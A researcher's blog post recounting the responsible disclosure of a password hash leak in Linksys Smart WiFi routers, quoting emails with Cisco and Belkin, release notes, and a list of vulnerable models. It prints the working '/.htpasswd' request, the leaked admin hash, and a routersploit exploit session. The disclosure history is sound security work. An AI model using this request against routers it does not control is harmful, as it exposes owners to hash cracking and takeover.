Password hash disclosure in Linksys Smart WiFi routers

This is my tale about reporting a specific security vulnerability in a major product, just to give some insight in how responsible disclosures are handled by a security researcher (me) and various software companies (Cisco, Linksys and Belkin).

On May 17 in 2013 I found a severe password hash disclosure in a Cisco Linksys EA6700 router. At that time this was the top model that Linksys had to offer for consumers. The router is a Linksys Smart WiFi router.

I performed a security assessment on the router and immediately saw a security weakness. When I requested the ‘/.htpasswd’ file on the router:

GET /.htpasswd HTTP/1.1
Host: 172.10.20.1

The server sent the following HTTP response:

HTTP/1.1 200 OK
Content-Type: application/octet-stream
Accept-Ranges: bytes
Content-Length: 41
Date: Fri, 17 May 2013 18:47:36 GMT
Server: lighttpd/1.4.28

admin:$1$3Eb757jl$zFM3Mtk8Qmkp3kjbRukUq/

Apart from the version number disclosure in the ‘Server’ HTTP header, I immediately saw the password hash from a user named ‘admin’.

The disclosure of a password hash is a common security vulnerability and falls into the category ‘key management errors’ and is registered under  CWE-320.

Fortunately I had admin access to this router and I changed the administrator password to see if this would reflect in a different password hash in file ‘/.htpasswd’. And it did. This way I confirmed that this password hash disclosure was a true positive.

As my job as security penetration tester I find (severe) security vulnerabilities all the time in a lot of very well known commercial of the shelf software products. Most of the time I don’t feel like reporting these vulnerabilities. Reporting vulnerabilities in a responsible manner to a company that doesn’t know you is an unpaid, time consuming and dirty job which has all kinds of legal risks attached to it. Most companies don’t like security researchers: they are annoying.

It didn’t feel right to leave the specific vulnerability unreported so I disclosed this vulnerability on October 24 in 2013 to the Cisco Product Security Incident Response Team in a quickly written e-mail:

From: Sijmen Ruwhof
Sent: Thursday, October 24, 2013 15:12
To: psirt at cisco.com
Subject: Password hash disclosure vulnerability in Cisco Linksys AE6700
Priority: High

Hi security team,

I’ve found an administrator password hash disclosure vulnerability in Cisco Linksys AE6700, and probably on all other routers using the same firmware. This finding is actually really simple: you can retrieve the password hash by performing an HTTP request to /.htpasswd on the router login page.

Can you confirm my finding?

Thanks,

Sijmen Ruwhof

My report was almost immediately read and I got a quick response from them:

From: [..] [mailto:[..]@cisco.com]
Sent: Thursday, October 24, 2013 8:27 AM
To: Sijmen Ruwhof; psirt at cisco.com; security
Subject: Re: Password hash disclosure vulnerability in Cisco Linksys AE6700

Sijmen:

Hi there. This is [..] with the Cisco PSIRT – Product Security Incident Response Team.

On March 15, 2013, Belkin completed the acquisition of Linksys – so any vulnerability reports on Linksys products should be handled by the Belkin Incident Response Team, which I’m cc’ing here.

As Linksys and Cisco are now two separate companies, it isn’t appropriate for us to know the details of any vulnerability affecting a Belkin/Linksys device – so I would ask you to please remove us from the CC list of any additional emails you may exchange with the Linksys/Belkin IRT.

Thanks for contacting the Cisco PSIRT

[..]

I didn’t know that Linksys was bought by Belkin. The product I tested was branded as  ‘Cisco Linksys EA6700’. Perhaps old packaging.

Belkin responded quickly also:

From: [..] [mailto:[..]@belkin.com]
Sent: Thursday October 24 2013 17:40
To: Sijmen Ruwhof; security
CC: [..]
Subject: RE: Password hash disclosure vulnerability in Cisco Linksys AE6700

Hello Sijmen

We will need a number of data points from you. I am assuming you are speaking of the EA6700? As there is no AE6700. What is the serial number of the router you tested with? What firmware version are you on…ie version & build….

From your statement it appears to be simple but please provide a step by step on how you discovered this vulnerability.

Regards,

[..]
Customer Support Engineer

My reply:

From: Sijmen Ruwhof
Sent: Friday, October 25, 2013 02:25
To: [..]; ‘security’
CC: [..]
Subject: RE: Password hash disclosure vulnerability in Linksys EA6700

Hi [..],

The correct product name is indeed Linksys EA6700. The serial number of the device is 1371060[..]. Information about the firmware version is unknown at this moment.

I’ve discovered the vulnerability when performing a security vulnerability assessment on the router, before placing it into a production network.

Reproduction: When you visit the address ‘http://ipAddressOfTheRouter/.htpasswd’ then a password hash is displayed.

I hope that I have supplied you with enough information to start confirming the issue.

Kind regards,

Sijmen Ruwhof

At that time I didn’t had access to the router so I couldn’t log into it and give them the firmware version number. Belkin wanted to know this number:

From: [..] [mailto:[..]@belkin.com]
Sent: Friday, October 25, 2013 21:11
To: Sijmen Ruwhof; security
CC: [..]
Subject: RE: Password hash disclosure vulnerability in Linksys EA6700

Hello Sijmen

We have open a case on your report. CASE 01227697. Our product team will look into your issue but in the meantime please provide the firmware version you tested when able. That is important piece of info we still need.

Regards,

[..]
Customer Support Engineer

Great, they opened a case to research the vulnerability. I figured out that the firmware version number was nice to know, but not mandatory for them to start investigating. Linksys Smark WiFi routers are configured to automatically update themselves, so the vulnerability was in the latest firmware version. And, if you disclosure a severe security vulnerability, you would assume that they take immediately action. I think I was wrong:

From: support at linksys.com [mailto:support at linksys.com]
Sent: Friday, December 13, 2013 17:10
To: sijmen at secundity.com
Subject: Security Mailer Report_Password hash disclosure vulnerability in Linksys EA6700 [ ref:_00D306e4T._50080RlJr6:ref ]

Hello Sijmen

We still need the firmware version and build you tested with. Please advise when able.

Reagrds

[..]
Sustaining Engineer

As I have a very busy schedule, I didn’t respond until February 2, 2014:

From: Sijmen Ruwhof
Sent: Sunday, February 2, 2014 22:11
To: ‘support at linksys.com’
Subject: RE: Security Mailer Report_Password hash disclosure vulnerability in Linksys EA6700 [ ref:_00D306e4T._50080RlJr6:ref ]

Hi [..],

I finally had access to the router again, so now I’m able to provide you with the additional details.

The EA6700 router’s firmware version is 1.1.40.153731

Kind regards,

Sijmen Ruwhof

Linksys didn’t reply to my e-mail, so I was curious if they started their investigation and sent them a reminder. I performed a quick test and saw that the vulnerability was still unpatched in the router, so perhaps they forgot about it?

From: Sijmen Ruwhof
Sent: Tuesday, May 20, 2014 14:08
To: ‘support at linksys.com’
Subject: RE: Security Mailer Report_Password hash disclosure vulnerability in Linksys EA6700 [ ref:_00D306e4T._50080RlJr6:ref ]

Hi [..],

Did you receive my mail below? Is the vulnerability patched? Or is the bug still in ‘waiting on confirmation’ status?

Thanks,

Sijmen Ruwhof

Linksys and Belkin have never answered the last two e-mails I sent them. That feels unthankful. As a security researcher you take the time and effort to make their products better. You even disclosure the matter in a responsible manner, but a final follow up is too much to ask. I didn’t even get a ‘thank you’ t-shirt 🙁

Today I read on the CERT web site of Homeland Security that they finally have fixed the issue. The vulnerability I found is apparently also registered under CVE-2014-8243. This registration has a minor error: it’s not a MD-5 hash that is disclosed.

At this moment the latest firmware for the Linksys EA6700 is version 1.1.40 build 160989. I just tested this firmware and they seemed to have fixed the issue. That’s good. When requesting ‘/.htpasswd’ the web server now gives back a ‘404 – Page Not Found’ error message.

I wondered if they reflected the security vulnerability in their release notes:

Firmware version: 1.1.40 (build 160989)
Release date: May 30, 2014

– Integration of BSP 6.37.14.62
– Updated libupnp to v1.6 to address a security vulnerability

=============================================

Firmware version: 1.1.40 (build 153731)
Release date: October 16, 2013

– Internet Explorer 11 support
– Fixes issue where inappropriate “Internet Connection is Down” error appears after router reboot or setup
– Translation improvements in several languages

=============================================

Firmware version: 1.1.38 (Build 149770)
Release date: March 20, 2013
[..]

They only mentioned a fixed security vulnerability in ‘libupnp’ in firmware version 1.1.40. If you read libupnp’s changelog, than you can find out that libupnp didn’t fix a password disclosure security vulnerability. It’s also not likely that the password disclosure is caused by libupnp.  So, Linksys chose to silently fix the issue. That’s not fair and transparent of them.

If you look at the timeline, Linksys released the patch for the issue on May 30 in 2014. I disclosed the vulnerability on October 24 in 2013, so it took them 218 days to fix it. Quite a long time for such a severe security vulnerability (!).

Vulnerable devices

The following devices are confirmed to be vulnerable for the password hash disclosure:

  • Linksys EA2700 < Ver.1.1.40 (Build 162751)
  • Linksys EA3500 < Ver.1.1.40 (Build 162464)
  • Linksys E4200v2 < Ver.2.1.41 (Build 162351)
  • Linksys EA4500 < Ver.2.1.41 (Build 162351)
  • Linksys EA6200 < Ver.1.1.41 (Build 162599)
  • Linksys EA6300 < Ver.1.1.40 (Build 160989)
  • Linksys EA6400 < Ver.1.1.40 (Build 160989)
  • Linksys EA6500 < Ver.1.1.40 (Build 160989)
  • Linksys EA6700 < Ver.1.1.40 (Build 160989)
  • Linksys EA6900 < Ver.1.1.42 (Build 161129)

Update April 3, 2017

Github user ‘lucyoa’ committed exploit code for the password disclosure vulnerability. If the given target is vulnerable, the hashed administrator’ password is retrieved. Usage of the exploit:

rsf > use exploits/linksys/smartwifi_password_disclosure
rsf (Linksys SMART WiFi Password Disclosure) > show options

Target options:

   Name       Current settings     Description
   ----       ----------------     -----------
   target                          Target address e.g. http://192.168.1.1
   port       80                   Target Port


rsf (Linksys SMART WiFi Password Disclosure) > set target 192.168.1.1
[+] {'target': '192.168.1.1'}
rsf (Linksys SMART WiFi Password Disclosure) > run
[*] Running module...

Sites that link to this story

  1. NVD.NIST.gov: CVE-2014-8243 details
  2. CVE.Mitre.org: CVE-2014-8243 details
  3. KB.CERT.org: Vulnerability Note VU#447516
  4. Video: Security Weekly episode 394 (starts at 27:00 minutes)
  5. Github.com: lucyoa: ‘Exploit implementation for Linksys SMART WiFi Password’ Disclosure vulnerability’

About Sijmen Ruwhof

Independent IT Security Researcher / Ethical Hacker
This entry was posted in password, responsible disclosure. Bookmark the permalink.

5 Responses to Password hash disclosure in Linksys Smart WiFi routers

  1. Yorick Koster (via LinkedIn) says:

    Helaas een heel herkenbaar verhaal…

  2. Klaas de Bont (via Twitter) says:

    Great story, lousy outcome. Wear this T-shirt to increase your credibility next time? 😉 https://pbs.twimg.com/media/B1cYTF1IQAA9LY3.jpg

  3. Mark Deiss (via LinkedIn) says:

    Goed gedaan!

  4. Brian Knopf says:

    Sijmen,
    We reviewed the article documenting your discovery of the vulnerability and the email chain between you and the Support Engineer regarding the EA6700 hash disclosure. At the time, the acquisition of Linksys had just occurred and the process for handling PSIRT issues at Belkin had not been created. We understand your frustration regarding the lack of response and not receiving credit for your discoveries. The Belkin PSIRT process was created after that incident and a few others to make sure that researchers have direct communication with the Application and Product Security team. We created [email protected] and [email protected] as direct communication points for vuln notification. We understand that does not rectify the fact the that your discovery was credited to someone else because they sent the disclosure directly to CERT. Unfortunately we do not have access to those old emails from you and the Linksys Support Engineer as they were previously being sent directly to employees on the Support team. The new way we have implemented has the emails going into a shared email account that the entire Application and Product Security team has access to. It’s checked throughout the day and issues are immediately logged and communicated out to engineering, PM, and other teams. We also respond to the researchers directly so they know we are working on it. We appreciate the work that you and other researchers do. We have made sure that the poor response process you experienced previously will not occur again. Additionally, we will be contacting CERT regarding this vulnerability and letting them know you should be credited as the original researcher who discovered it.

    Brian Knopf
    Director of Application and Product Security

    • Hi Brian,

      Good to hear that the security incident process has been improved. Acquisitions always temporary lowers the quality of processes and the internal organisation.

      The other security researcher that did find the vulnerability (Kyle Lovett) contacted me and US CERT and made sure my name is named in the credits of the vulnerability disclosure by US CERT.

      Thanks for your response! That is appreciated.

      Sijmen

Comments are closed.